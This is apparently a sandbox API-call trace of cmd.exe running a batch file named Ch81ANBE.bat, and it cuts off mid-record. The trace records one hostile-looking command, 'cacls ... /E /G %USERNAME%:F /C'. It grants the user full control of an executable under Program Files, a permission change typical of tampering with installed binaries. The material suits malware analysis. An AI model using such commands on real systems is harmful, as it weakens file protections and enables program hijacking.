(_String1="\"C", _String2="RD") returned -80 [0141.634] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0141.634] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0141.634] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0141.635] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0141.635] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0141.635] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0141.635] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0141.635] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0141.635] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0141.635] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0141.635] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0141.635] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0141.635] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0141.635] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0141.635] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0141.635] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0141.635] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0141.635] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0141.635] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0141.635] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0141.635] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0141.635] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0141.635] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0141.635] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0141.635] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0141.635] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0141.635] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0141.635] GetProcessHeap () returned 0x410000 [0141.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x4251c0 [0141.636] GetProcessHeap () returned 0x410000 [0141.636] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe8) returned 0x4253d8 [0141.638] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0141.639] GetProcessHeap () returned 0x410000 [0141.639] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x418) returned 0x4107f0 [0141.639] SetErrorMode (uMode=0x0) returned 0x0 [0141.639] SetErrorMode (uMode=0x1) returned 0x0 [0141.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x4107f8, lpFilePart=0x1eefd8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eefd8*="Desktop") returned 0x25 [0141.639] SetErrorMode (uMode=0x0) returned 0x1 [0141.639] GetProcessHeap () returned 0x410000 [0141.639] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4107f0, Size=0x6e) returned 0x4107f0 [0141.639] GetProcessHeap () returned 0x410000 [0141.639] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4107f0) returned 0x6e [0141.639] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 1 [0141.640] GetProcessHeap () returned 0x410000 [0141.640] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5a) returned 0x4254c8 [0141.640] GetProcessHeap () returned 0x410000 [0141.640] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa8) returned 0x425530 [0141.640] GetProcessHeap () returned 0x410000 [0141.640] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425530, Size=0x5a) returned 0x425530 [0141.640] GetProcessHeap () returned 0x410000 [0141.640] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425530) returned 0x5a [0141.640] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.640] GetProcessHeap () returned 0x410000 [0141.640] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe0) returned 0x410868 [0141.645] GetProcessHeap () returned 0x410000 [0141.645] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x410868, Size=0x76) returned 0x410868 [0141.645] GetProcessHeap () returned 0x410000 [0141.645] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x410868) returned 0x76 [0141.645] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.645] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", fInfoLevelId=0x1, lpFindFileData=0x1eed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eed74) returned 0x425598 [0141.646] GetProcessHeap () returned 0x410000 [0141.646] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4255d8 [0141.646] FindClose (in: hFindFile=0x425598 | out: hFindFile=0x425598) returned 1 [0141.646] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0141.646] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0141.646] GetConsoleTitleW (in: lpConsoleTitle=0x1ef24c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.646] GetProcessHeap () returned 0x410000 [0141.646] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x11c) returned 0x4108e8 [0141.646] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0141.646] GetProcAddress (hModule=0x77710000, lpProcName="SaferIdentifyLevel") returned 0x77732102 [0141.646] IdentifyCodeAuthzLevelW () returned 0x1 [0141.652] GetProcAddress (hModule=0x77710000, lpProcName="SaferComputeTokenFromLevel") returned 0x77733352 [0141.652] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0141.652] GetProcAddress (hModule=0x77710000, lpProcName="SaferCloseLevel") returned 0x77733825 [0141.652] CloseCodeAuthzLevel () returned 0x1 [0141.653] SetErrorMode (uMode=0x0) returned 0x0 [0141.653] SetErrorMode (uMode=0x1) returned 0x0 [0141.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x104, lpBuffer=0x4251c8, lpFilePart=0x1ef138 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x1ef138*="Ch81ANBE.bat") returned 0x32 [0141.653] SetErrorMode (uMode=0x0) returned 0x1 [0141.653] GetProcessHeap () returned 0x410000 [0141.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x72) returned 0x420f68 [0141.653] wcsspn (_String=" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"", _Control=" \x09") returned 0x1 [0141.653] GetProcessHeap () returned 0x410000 [0141.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x7c) returned 0x4111b8 [0141.653] GetProcessHeap () returned 0x410000 [0141.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xf0) returned 0x4260f8 [0141.653] GetProcessHeap () returned 0x410000 [0141.653] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4260f8, Size=0x7e) returned 0x4260f8 [0141.653] GetProcessHeap () returned 0x410000 [0141.653] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4260f8) returned 0x7e [0141.653] CmdBatNotification () returned 0x42522a [0141.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef17c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0141.654] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0141.654] _get_osfhandle (_FileHandle=3) returned 0x78 [0141.654] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.654] _get_osfhandle (_FileHandle=3) returned 0x78 [0141.654] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.654] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef160, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x1ef160*=0xe2, lpOverlapped=0x0) returned 1 [0141.655] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0141.655] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=32, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0141.656] _get_osfhandle (_FileHandle=3) returned 0x78 [0141.656] GetFileType (hFile=0x78) returned 0x1 [0141.656] _get_osfhandle (_FileHandle=3) returned 0x78 [0141.656] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0141.656] GetProcessHeap () returned 0x410000 [0141.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x428a78 [0141.656] GetProcessHeap () returned 0x410000 [0141.656] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x434ab0 [0141.657] GetProcessHeap () returned 0x410000 [0141.657] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a) returned 0x4277c8 [0141.657] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0141.657] GetProcessHeap () returned 0x410000 [0141.657] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4277c8 | out: hHeap=0x410000) returned 1 [0141.657] GetProcessHeap () returned 0x410000 [0141.657] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x434ab0 | out: hHeap=0x410000) returned 1 [0141.657] GetProcessHeap () returned 0x410000 [0141.657] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428a78 | out: hHeap=0x410000) returned 1 [0141.659] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0141.659] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0141.659] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0141.659] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0141.659] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0141.659] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0141.659] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0141.659] GetProcessHeap () returned 0x410000 [0141.660] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x411240 [0141.660] GetProcessHeap () returned 0x410000 [0141.660] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x14) returned 0x4112a0 [0141.666] GetProcessHeap () returned 0x410000 [0141.666] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xbe) returned 0x426180 [0141.668] _tell (_FileHandle=3) returned 32 [0141.668] _close (_FileHandle=3) returned 0 [0141.668] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1eef34 | out: _Buffer="\r\n") returned 2 [0141.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.668] GetFileType (hFile=0x7) returned 0x2 [0144.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.111] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef4 | out: lpMode=0x1eeef4) returned 1 [0144.111] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1eef20, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1eef20*=0x2) returned 1 [0144.112] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0144.112] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0144.113] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1eef30 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0144.113] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x1eef30 | out: _Buffer=">") returned 1 [0144.113] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.113] GetFileType (hFile=0x7) returned 0x2 [0144.113] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.113] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eeef8 | out: lpMode=0x1eeef8) returned 1 [0144.114] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.114] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x1eef24, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x1eef24*=0x26) returned 1 [0144.115] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.115] GetFileType (hFile=0x7) returned 0x2 [0144.115] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.116] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef17c | out: lpMode=0x1ef17c) returned 1 [0144.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.116] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4112a8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1ef1a8, lpReserved=0x0 | out: lpBuffer=0x4112a8*, lpNumberOfCharsWritten=0x1ef1a8*=0x5) returned 1 [0144.116] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1ef1b4 | out: _Buffer=" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C ") returned 91 [0144.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.117] GetFileType (hFile=0x7) returned 0x2 [0144.117] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.117] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef174 | out: lpMode=0x1ef174) returned 1 [0144.117] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.117] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x5b, lpNumberOfCharsWritten=0x1ef1a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1a0*=0x5b) returned 1 [0144.118] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef1d4 | out: _Buffer="\r\n") returned 2 [0144.118] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.118] GetFileType (hFile=0x7) returned 0x2 [0144.118] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.118] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef194 | out: lpMode=0x1ef194) returned 1 [0144.119] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.119] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef1c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x1ef1c0*=0x2) returned 1 [0144.119] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0144.119] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0144.119] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0144.119] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0144.119] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0144.119] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0144.119] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0144.119] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0144.119] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0144.119] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0144.120] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0144.120] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0144.120] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0144.120] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0144.120] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0144.120] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0144.120] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0144.120] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0144.120] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0144.120] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0144.120] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0144.120] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0144.120] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0144.121] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0144.121] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0144.121] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0144.121] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0144.121] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0144.121] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0144.121] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0144.121] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0144.121] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0144.121] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0144.121] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0144.121] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0144.121] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0144.121] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0144.121] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0144.121] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0144.122] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0144.122] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0144.122] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0144.122] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0144.123] GetProcessHeap () returned 0x410000 [0144.123] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x418) returned 0x426248 [0144.123] SetErrorMode (uMode=0x0) returned 0x0 [0144.123] SetErrorMode (uMode=0x1) returned 0x0 [0144.123] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x426250, lpFilePart=0x1eef78 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eef78*="Desktop") returned 0x25 [0144.123] SetErrorMode (uMode=0x0) returned 0x1 [0144.123] GetProcessHeap () returned 0x410000 [0144.123] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x426248, Size=0x60) returned 0x426248 [0144.123] GetProcessHeap () returned 0x410000 [0144.123] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x426248) returned 0x60 [0144.123] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.123] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0144.124] GetProcessHeap () returned 0x410000 [0144.124] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x120) returned 0x4262b0 [0144.124] GetProcessHeap () returned 0x410000 [0144.124] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x238) returned 0x4263d8 [0144.128] GetConsoleTitleW (in: lpConsoleTitle=0x1eed44, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.129] GetConsoleTitleW (in: lpConsoleTitle=0x1eead8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.129] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ee960, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eea28 | out: lpAttributeList=0x1ee960, lpSize=0x1eea28) returned 1 [0144.129] UpdateProcThreadAttribute (in: lpAttributeList=0x1ee960, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eea20, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ee960, lpPreviousValue=0x0) returned 1 [0144.129] GetStartupInfoW (in: lpStartupInfo=0x1ee91c | out: lpStartupInfo=0x1ee91c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0144.149] CloseHandle (hObject=0x78) returned 1 [0144.149] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0144.149] GetProcessHeap () returned 0x410000 [0144.149] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x427f38 | out: hHeap=0x410000) returned 1 [0144.149] GetEnvironmentStringsW () returned 0x427f38* [0144.149] GetProcessHeap () returned 0x410000 [0144.149] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb36) returned 0x428a78 [0144.149] FreeEnvironmentStringsW (penv=0x427f38) returned 1 [0144.149] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0163.177] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x1ee8fc | out: lpExitCode=0x1ee8fc*=0x1f57) returned 1 [0163.178] CloseHandle (hObject=0x74) returned 1 [0163.178] _vsnwprintf (in: _Buffer=0x1eea44, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ee908 | out: _Buffer="00001F57") returned 8 [0163.178] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0163.179] GetProcessHeap () returned 0x410000 [0163.179] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428a78 | out: hHeap=0x410000) returned 1 [0163.179] GetEnvironmentStringsW () returned 0x427f38* [0163.179] GetProcessHeap () returned 0x410000 [0163.179] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb5c) returned 0x42a120 [0163.179] FreeEnvironmentStringsW (penv=0x427f38) returned 1 [0163.180] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0163.180] GetProcessHeap () returned 0x410000 [0163.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42a120 | out: hHeap=0x410000) returned 1 [0163.180] GetEnvironmentStringsW () returned 0x427f38* [0163.180] GetProcessHeap () returned 0x410000 [0163.180] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb5c) returned 0x42a120 [0163.180] FreeEnvironmentStringsW (penv=0x427f38) returned 1 [0163.180] GetProcessHeap () returned 0x410000 [0163.180] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410db8 | out: hHeap=0x410000) returned 1 [0163.180] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ee960 | out: lpAttributeList=0x1ee960) [0163.180] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.180] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0163.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0163.181] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0163.181] _get_osfhandle (_FileHandle=0) returned 0x3 [0163.181] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0163.182] SetConsoleInputExeNameW () returned 0x1 [0163.182] GetConsoleOutputCP () returned 0x1b5 [0163.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0163.182] SetThreadUILanguage (LangId=0x0) returned 0x409 [0163.183] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef17c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0163.183] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0163.183] _get_osfhandle (_FileHandle=3) returned 0x74 [0163.184] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0163.184] GetProcessHeap () returned 0x410000 [0163.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426b38 | out: hHeap=0x410000) returned 1 [0163.184] GetProcessHeap () returned 0x410000 [0163.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426a08 | out: hHeap=0x410000) returned 1 [0163.184] GetProcessHeap () returned 0x410000 [0163.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4268e0 | out: hHeap=0x410000) returned 1 [0163.184] GetProcessHeap () returned 0x410000 [0163.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426878 | out: hHeap=0x410000) returned 1 [0163.184] GetProcessHeap () returned 0x410000 [0163.184] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4267a0 | out: hHeap=0x410000) returned 1 [0163.184] GetProcessHeap () returned 0x410000 [0163.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426588 | out: hHeap=0x410000) returned 1 [0163.185] GetProcessHeap () returned 0x410000 [0163.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426508 | out: hHeap=0x410000) returned 1 [0163.185] GetProcessHeap () returned 0x410000 [0163.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4263d8 | out: hHeap=0x410000) returned 1 [0163.185] GetProcessHeap () returned 0x410000 [0163.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4262b0 | out: hHeap=0x410000) returned 1 [0163.185] GetProcessHeap () returned 0x410000 [0163.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426248 | out: hHeap=0x410000) returned 1 [0163.185] GetProcessHeap () returned 0x410000 [0163.185] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426180 | out: hHeap=0x410000) returned 1 [0163.186] GetProcessHeap () returned 0x410000 [0163.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4112a0 | out: hHeap=0x410000) returned 1 [0163.186] GetProcessHeap () returned 0x410000 [0163.186] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x411240 | out: hHeap=0x410000) returned 1 [0163.186] _get_osfhandle (_FileHandle=3) returned 0x74 [0163.187] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0163.187] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef160, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, 